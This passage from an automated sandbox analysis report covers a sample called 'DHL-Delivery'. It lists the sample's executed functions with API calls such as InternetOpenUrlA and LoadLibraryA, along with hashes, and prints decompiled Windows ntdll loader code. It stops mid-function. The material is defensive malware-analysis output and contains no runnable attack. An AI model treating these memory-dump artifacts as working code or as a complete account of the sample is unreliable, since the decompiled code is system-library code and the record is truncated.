
                        • Executed
                        • Not Executed
                        control_flow_graph 719 565a48-565a79 InternetOpenUrlA 720 565a7f-565ae9 719->720 721 565d1c-565d4b 719->721 725 565aec-565b7c call 565b10 720->725 732 565bae-565bfa call 56ab16 725->732 733 565b7e-565ba8 725->733 732->721 738 565c00-565c23 732->738 733->732 739 565c25-565c53 738->739 740 565c5d-565d13 call 56ab16 * 2 738->740 739->725
                        APIs
                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00565A6B
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InternetOpen
                        • String ID: -+BC
                        • API String ID: 2038078732-1788755027
                        • Opcode ID: 1a3cfd7fb883f5840f24e4ad6c3d243adbbdafe463af11c1fa88ed1a04fd4901
                        • Instruction ID: 61160a0c731772857abf24dd6ef1bf18e7e2df2525521534b71c40e9b68a4226
                        • Opcode Fuzzy Hash: 1a3cfd7fb883f5840f24e4ad6c3d243adbbdafe463af11c1fa88ed1a04fd4901
                        • Instruction Fuzzy Hash: 98213E7028074BDBEB308E24CAA47EF2BAABF51380F608625DD0697551F732C944DB11
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 005690C3, Relevance: 1.7, APIs: 1, Instructions: 157libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 45fca3a58a572a0ab86014a858dbaeaa3d0d50a2af4ccb83505b4fee35663f2d
                        • Instruction ID: d3f3599a497828e622f318e3a91e8c9516d82e502e0b9d2d000bb6069091d459
                        • Opcode Fuzzy Hash: 45fca3a58a572a0ab86014a858dbaeaa3d0d50a2af4ccb83505b4fee35663f2d
                        • Instruction Fuzzy Hash: 1841F698B4571BA5DF34307805B93FF099BAF62BE0FF44B36DC8393185AA6644C59102
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 00563BE3, Relevance: 1.6, APIs: 1, Instructions: 144libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: f88ee85f83b795f24fdb97f415a275924762e6dbff2cf7a72617f166c2a30f3e
                        • Instruction ID: 46324f18dd8d31e58a3fc8027f81a8890f5d8e62fe9e497340f4503ff4a0dec9
                        • Opcode Fuzzy Hash: f88ee85f83b795f24fdb97f415a275924762e6dbff2cf7a72617f166c2a30f3e
                        • Instruction Fuzzy Hash: 42416DA0B447039DEF34157889B87FB1A96BF527A0FA44B29DC4397286FB1589C48742
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 005639DD, Relevance: 1.6, APIs: 1, Instructions: 122librarythreadUNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadTerminateThread
                        • String ID:
                        • API String ID: 3464572979-0
                        • Opcode ID: 149e187a5145e804093eb4fb07afe89b61ca8692c9e23f3a5133b3fcf3e1b1d0
                        • Instruction ID: c19d4426565922bf8ff657a163b29784cf0f89605e199aed6853f4722611b1d6
                        • Opcode Fuzzy Hash: 149e187a5145e804093eb4fb07afe89b61ca8692c9e23f3a5133b3fcf3e1b1d0
                        • Instruction Fuzzy Hash: 9431D1B1995702EEEB21555889687D63B92BF173F0FA40201EC924B2D6F321C883D512
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00563A0A, Relevance: 1.6, APIs: 1, Instructions: 113librarythreadUNIQUE
                        Download Yara Rule
                        APIs
                        • TerminateThread.KERNELBASE(000000FE,00000000), ref: 00563A28
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadTerminateThread
                        • String ID:
                        • API String ID: 3464572979-0
                        • Opcode ID: 1d64b7d44dfa9decaf86c41fb4d1662117de6cef1030f10140a3907e55a65710
                        • Instruction ID: d2ce84aa5d15c793d43192ff8a2238da93d775b8670900db772c18812dee5488
                        • Opcode Fuzzy Hash: 1d64b7d44dfa9decaf86c41fb4d1662117de6cef1030f10140a3907e55a65710
                        • Instruction Fuzzy Hash: 55319071991706AEEF3049A449687D63B51BF273F0FA90511EC92472D5F710C8C29511
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 0056B348, Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 6764a163ee94a077ecba292d65fe15efc8bfd71a0f6e322f3dd1fe28b28ef452
                        • Instruction ID: 878dc04d145b05ae84164b105fb20a58c6af6a61d4c14fd394cd8b8710dac43e
                        • Opcode Fuzzy Hash: 6764a163ee94a077ecba292d65fe15efc8bfd71a0f6e322f3dd1fe28b28ef452
                        • Instruction Fuzzy Hash: CA113895A44307B8DF3425B41AB97FF0D47AF52F74FB00B2AEC42D3146EE5588C84612
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 005683B9, Relevance: 1.6, APIs: 1, Instructions: 78libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction ID: c1d2322e6ec264f27c17ff8fcf335767c45eba15774cfe144dfa923d01fc2236
                        • Opcode Fuzzy Hash: 754b74b59c0beadf1b5b5e54c81342093bdab90e62a06f8407db8328a425acd7
                        • Instruction Fuzzy Hash: 6C1184A9A85307A8DF30357545B93FF1E43BF51BB4FA05B26EC42D3102EE6685C94213
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 005683AC, Relevance: 1.6, APIs: 1, Instructions: 75libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction ID: a5e400c1c78b3017f7be881a05ee2e4419cd062a284e452f99d44f3abe5889eb
                        • Opcode Fuzzy Hash: 67dc515dba15488b25c5d5e3f5b6c1342b9d1606cde30ec88de46233dbf80779
                        • Instruction Fuzzy Hash: 58110898A45307B8DF34217559B97FF0A47AF52BB4FA04B2AEC82D3106EE6588C54612
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 005683F4, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction ID: 540f87b2fefc2df52ed24371b611a7ad5ac78638364223803642f31856a20a7c
                        • Opcode Fuzzy Hash: d9a40da110f353ef003371691e59014806868850d0438cb2941cad94f381c71d
                        • Instruction Fuzzy Hash: 8D018EA5B85317A9DF30257140AA3FE1E43BE51B64FA01B66FC02D3242EE668984C253
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 0056844D, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction ID: 6a6751ff20592ef4425cbfd0337137f63010dfcfc47b0512af2332c6a476c786
                        • Opcode Fuzzy Hash: 520f0b2cf67b739046e0225c3429068caea7924f376e79da054d34f0421b9158
                        • Instruction Fuzzy Hash: FDF0A2BA7C6357E9CF3035B540ED3EE2B83AC51E603900659FC02D3201EA738545C163
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 0056849C, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction ID: f3175ba202437ed15cf1f249a82df1366e2ab6f91ba89ab7323875e23fee80dc
                        • Opcode Fuzzy Hash: 9ffd683a0c2ed2bfc1f65df5ac9fbe0acf60a720a79b9ed5b999a0dbaff3fdad
                        • Instruction Fuzzy Hash: A7F0557AA86353DACB2079B681992DD2B93AC61EA07904199F803C3300EA32C646C5B3
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 00565352, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction ID: fa8489fd41ae7ab751905cc7bbc093eb4276f0f8d04f090401729b6be0b8e6e5
                        • Opcode Fuzzy Hash: 2de80237a2675273c824c40b7ceb527adcceca5768e4b6c6f6ff960e24da68fd
                        • Instruction Fuzzy Hash: 9CE0C238784702BCF6240C50AD9BFEE16155F90FC0F24481DBF49BA2C0A6D009549002
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 00565367, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction ID: 4370dd419fc526806501fcc60af9694308c747f53613ff767a1b9cfbdf233606
                        • Opcode Fuzzy Hash: c9744405fb262165574e55f36152400cdb7645d44a9e7bf0a61c6cda12ef2b09
                        • Instruction Fuzzy Hash: 89E0CD7D6927939DE3109CB5848ABC53622AF61B94F10406CFE05EB141F7B18616C176
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 005653AB, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,005652B1,005653FC), ref: 005653C7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction ID: 93a01b05bfee774a62f6a54126bef9688b72b052bea310f34946de0bf6d2a468
                        • Opcode Fuzzy Hash: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction Fuzzy Hash: CEC012249407479CEB102A759C18BDF79044F527B1F54471D9EF4651D1965001658561
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 1E12061A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 42f3d0e3a1521639c54f07997fa0eb797cd1b7ceea437475849e00ccabb03fa6
                        • Instruction ID: 16de8606a6b1580fb62b91bc56a893ec7a2224f292978766c05eeaaf8d3661c0
                        • Opcode Fuzzy Hash: 42f3d0e3a1521639c54f07997fa0eb797cd1b7ceea437475849e00ccabb03fa6
                        • Instruction Fuzzy Hash: 67B09276D424CACFE611E7645B08B1B7A066BD0B12FBAC272E2130641E4738C0D5F6B6
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Non-executed Functions

                        Function 1E0DBCE6, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 150timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 52%
                        			E1E0DBCE6(void* __ecx, void* __eflags) {
				signed int _v8;
				void* _v540;
				void* _v552;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				intOrPtr _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* _v908;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1e1d6360 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1E0DBC98( &_v788,  &_v876, __eflags);
				_t110 = _t52;
				if(_t52 < 0) {
					_t85 =  *0x1e1ce7b0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1E0DB4F0(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1E1225C0(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa12);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1E15BDA0();
					_t85 =  *0x1e1ce7b0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1E0FA838(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1E0FAE6D( &_v792,  &_v872, _t110, 0,  &_v892);
				if(_v804 != 0) {
					E1E0E1EE0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1e1ce7b0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0xa25, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1e1ce7b0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1e1d0c10 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1E10DCFF( *((intOrPtr*)(_t108 + 0xc)));
					E1E0FB42D(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1E0DC147( *((intOrPtr*)(_t108 + 0xc)), _t96, _t99, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1e1ce7b0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa33);
						goto L11;
					}
					_t104 =  *0x1e1d4208; // 0x0
					_v880 = _t108 + 0x178;
					 *((intOrPtr*)(_t108 + 0x14)) = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1e1d09c4; // 0x752c20
					asm("ror esi, cl");
					 *0x1e1d41e0(_t108 + 0x18, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1E0DBE3E(_v892);
						if(_v892 != _t108 + 0x178) {
							E1E0F4EC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v892);
						}
					}
					goto L6;
				}
			}







































                        0x1e0dbcee
                        0x1e0dbcfb
                        0x1e0dbd07
                        0x1e0dbd08
                        0x1e0dbd0d
                        0x1e0dbd13
                        0x1e0dbd14
                        0x1e0dbd19
                        0x1e0dbd1f
                        0x1e0dbd27
                        0x1e0dbd31
                        0x1e0dbd39
                        0x1e0dbd3e
                        0x1e0dbd43
                        0x1e0dbd45
                        0x1e14d0de
                        0x1e14d0e4
                        0x1e14d0e7
                        0x1e14d121
                        0x1e14d121
                        0x1e14d14b
                        0x1e14d14b
                        0x1e14d151
                        0x1e14d151
                        0x1e0dbe1b
                        0x1e0dbe1b
                        0x1e0dbe23
                        0x1e14d199
                        0x1e14d199
                        0x1e0dbe30
                        0x1e0dbe31
                        0x1e0dbe32
                        0x1e0dbe3d
                        0x1e0dbe3d
                        0x1e14d0e9
                        0x1e14d0ea
                        0x1e14d0ef
                        0x1e14d0f1
                        0x1e14d0f6
                        0x1e14d10e
                        0x1e14d10e
                        0x1e14d113
                        0x1e14d118
                        0x1e14d11e
                        0x00000000
                        0x1e14d11e
                        0x1e0dbd57
                        0x1e0dbd64
                        0x1e0dbd71
                        0x1e0dbd77
                        0x1e14d15b
                        0x1e14d15b
                        0x1e0dbd7d
                        0x1e0dbd7f
                        0x1e14d165
                        0x1e14d16a
                        0x1e14d16c
                        0x1e14d13c
                        0x1e14d141
                        0x1e14d146
                        0x1e14d146
                        0x1e14d149
                        0x00000000
                        0x1e0dbd85
                        0x1e0dbd89
                        0x1e0dbd97
                        0x1e0dbd9c
                        0x1e0dbda5
                        0x1e0dbdaa
                        0x1e0dbdb1
                        0x1e14d170
                        0x1e14d176
                        0x1e14d179
                        0x00000000
                        0x00000000
                        0x1e14d0fd
                        0x1e14d0fe
                        0x1e14d103
                        0x1e14d104
                        0x1e14d109
                        0x00000000
                        0x1e14d109
                        0x1e0dbdb7
                        0x1e0dbdc4
                        0x1e0dbdca
                        0x1e0dbdd2
                        0x1e0dbde0
                        0x1e0dbde9
                        0x1e0dbdf5
                        0x1e0dbdff
                        0x1e0dbe05
                        0x1e0dbe15
                        0x1e14d18b
                        0x1e14d18b
                        0x1e0dbe15
                        0x00000000
                        0x1e0dbdff

                        APIs
                        • RtlDebugPrintTimes.NTDLL ref: 1E0DBDF5
                          • Part of subcall function 1E0DBE3E: RtlDebugPrintTimes.NTDLL ref: 1E0DBEED
                          • Part of subcall function 1E0DBE3E: RtlDebugPrintTimes.NTDLL ref: 1E0DBF38
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-521726492
                        • Opcode ID: d60906ad360fa09f27204278032c5bfacee9d78a1e091b9ce7f44039e02c0e1f
                        • Instruction ID: 388803f4eb671ff070c845f8d72daefe0548107d6ed9461d6703a41aae7fa9ab
                        • Opcode Fuzzy Hash: d60906ad360fa09f27204278032c5bfacee9d78a1e091b9ce7f44039e02c0e1f
                        • Instruction Fuzzy Hash: D951BFB52087449BE720CF24C894B9F77E9FF84644F604A1DF99597290DB30EA84CB92
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E0FAF50, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 145timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E1E0FAF50(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t67;
				intOrPtr _t70;
				intOrPtr _t79;
				signed int _t80;
				signed char _t81;
				intOrPtr _t87;
				intOrPtr _t90;
				intOrPtr _t99;
				char _t100;
				signed int _t101;
				signed int _t102;
				signed char _t105;
				signed int _t107;
				signed int _t110;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				signed int _t131;
				signed int _t132;
				void* _t135;
				void* _t136;

				_push(0x68);
				_push(0x1e1b8b08);
				_t67 = E1E134384(__ebx, __edi, __esi);
				_t123 =  *[fs:0x18];
				_t99 =  *((intOrPtr*)(_t123 + 0x30));
				if( *0x1e1d0c68 != 0) {
					L19:
					return E1E1343C9(_t67);
				}
				_t101 =  *(_t99 + 0x10);
				 *((intOrPtr*)(_t135 - 0x30)) =  *((intOrPtr*)(_t101 + 0x40));
				_t70 =  *((intOrPtr*)(_t101 + 0x44));
				 *((intOrPtr*)(_t135 - 0x2c)) = _t70;
				_t102 =  *(_t99 + 0x10);
				if(( *(_t102 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t135 - 0x2c)) = _t70 + _t102;
				}
				if(( *0x1e1ce7b0 & 0x00000005) != 0) {
					_push(_t135 - 0x30);
					E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x17e1, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t123 + 0x20)));
					_t136 = _t136 + 0x1c;
				}
				 *0x1e1d0c6c =  *((intOrPtr*)(_t123 + 0x24));
				 *0x1e1d0c68 = 1;
				if( *0x1e1d14b0 != 0) {
					_t114 =  *0x7ffe0330;
					_t131 =  *0x1e1d41f8; // 0x0
					asm("ror esi, cl");
					_t132 = _t131 ^  *0x7ffe0330;
					_t102 = _t132;
					 *0x1e1d41e0(0x20);
					 *_t132();
				}
				_t79 =  *((intOrPtr*)(_t123 + 0xfb4));
				if(_t79 != 0) {
					_push(_t79);
					E1E103780(_t102, _t114);
				}
				if(( *0x1e1ce8fc & 0x00000002) == 0) {
					_t80 =  *(_t99 + 0x10);
					__eflags =  *(_t80 + 8) & 0x40000000;
					_t105 = _t102 & 0xffffff00 | ( *(_t80 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1e1d4234 & 0x00000001;
					_t81 = _t80 & 0xffffff00 | ( *0x1e1d4234 & 0x00000001) == 0x00000000;
					__eflags = _t81 & _t105;
					if((_t81 & _t105) == 0) {
						goto L7;
					}
					 *((char*)(_t135 - 0x19)) = 1;
					_t100 = 0;
					L15:
					_t87 =  *[fs:0x30];
					__eflags =  *0x1e1d1750;
					if( *0x1e1d1750 != 0) {
						__eflags =  *((intOrPtr*)(_t87 + 0x18)) - _t100;
						if( *((intOrPtr*)(_t87 + 0x18)) != _t100) {
							E1E15E641(_t106);
							 *0x1e1d1750 = _t100;
						}
					}
					__eflags =  *((char*)(_t135 - 0x19));
					if( *((char*)(_t135 - 0x19)) == 0) {
						E1E11A4E0(_t106);
					}
					_t67 = E1E11A09F();
					goto L19;
				}
				L7:
				_t100 = 0;
				_t106 = 0;
				 *((char*)(_t135 - 0x19)) = 0;
				_t124 =  *0x1e1d0c60; // 0x7863d0
				L8:
				if(_t124 != 0x1e1d0c5c) {
					_t18 = _t124 - 0x10; // 0x7863c0
					_t118 = _t18;
					 *((intOrPtr*)(_t135 - 0x24)) = _t118;
					_t20 = _t124 + 4; // 0x786740
					_t124 =  *_t20;
					 *((intOrPtr*)(_t135 - 0x20)) = _t124;
					_t22 = _t118 + 0x1c; // 0x6fd575c0
					_t90 =  *_t22;
					 *((intOrPtr*)(_t135 - 0x28)) = _t90;
					if(_t90 != 0 && ( *(_t118 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t135 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t135 - 0x50)) = 1;
						_t110 = 7;
						memset(_t135 - 0x4c, 0, _t110 << 2);
						_t136 = _t136 + 0xc;
						_t31 = _t118 + 0x48; // 0x0
						E1E0F8F70(_t135 - 0x54,  *_t31);
						 *((intOrPtr*)(_t135 - 4)) = _t100;
						_t129 =  *((intOrPtr*)(_t135 - 0x24));
						_t149 =  *((intOrPtr*)(_t129 + 0x3a)) - _t100;
						if( *((intOrPtr*)(_t129 + 0x3a)) != _t100) {
							E1E0FA920(0, _t129);
						}
						_push(1);
						_push(_t100);
						_t106 =  *((intOrPtr*)(_t135 - 0x28));
						E1E0ED3B7(_t100,  *((intOrPtr*)(_t135 - 0x28)),  *((intOrPtr*)(_t129 + 0x18)), _t129, 1, _t149);
						 *((intOrPtr*)(_t135 - 4)) = 0xfffffffe;
						_t124 =  *((intOrPtr*)(_t135 - 0x20));
						E1E0FB0FB();
					}
					goto L8;
				}
				_t115 =  *0x1e1d09c4; // 0x752c20
				__eflags =  *((intOrPtr*)(_t115 + 0x3a)) - _t100;
				if( *((intOrPtr*)(_t115 + 0x3a)) != _t100) {
					 *((intOrPtr*)(_t135 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t135 - 0x74)) = 1;
					_t107 = 7;
